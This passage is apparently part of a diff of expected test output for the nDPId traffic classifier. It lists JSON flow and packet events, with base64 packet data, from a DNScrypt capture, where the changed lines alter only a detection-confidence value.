{"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":946739337076,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337076,"pkt":"ZmZmZmZmRERERERECABFAADWnoBAADURNfszD3zQCgAAARD3sT8Awv\/QaUWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":946739337077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337077,"pkt":"ZmZmZmZmRERERERECABFAADWnoFAADURNfozD3zQCgAAARD32dgAwtc5aUOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":946739337077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337077,"pkt":"ZmZmZmZmRERERERECABFAADWnoJAADURNfkzD3zQCgAAARD3wzcAwu3baUKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/chAAL0ReVsKAAABp3LcfZBCAbsCCEbGm2kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/ckgAL0RlZoKAAABp3LcfZZsAbsGBGHYm2YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":397,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337078} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":397,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/ckAub0Rum0KAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/cpAAL0ReVkKAAABp3LcfZuIAbsCCEbGm2cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/csgAL0RlZgKAAABp3LcfbItAbsGBEYVm2gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":400,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337078} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":400,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/csAub0RumsKAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/cwgAL0RlZcKAAABp3LcfejFAbsGBA+Bm2QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA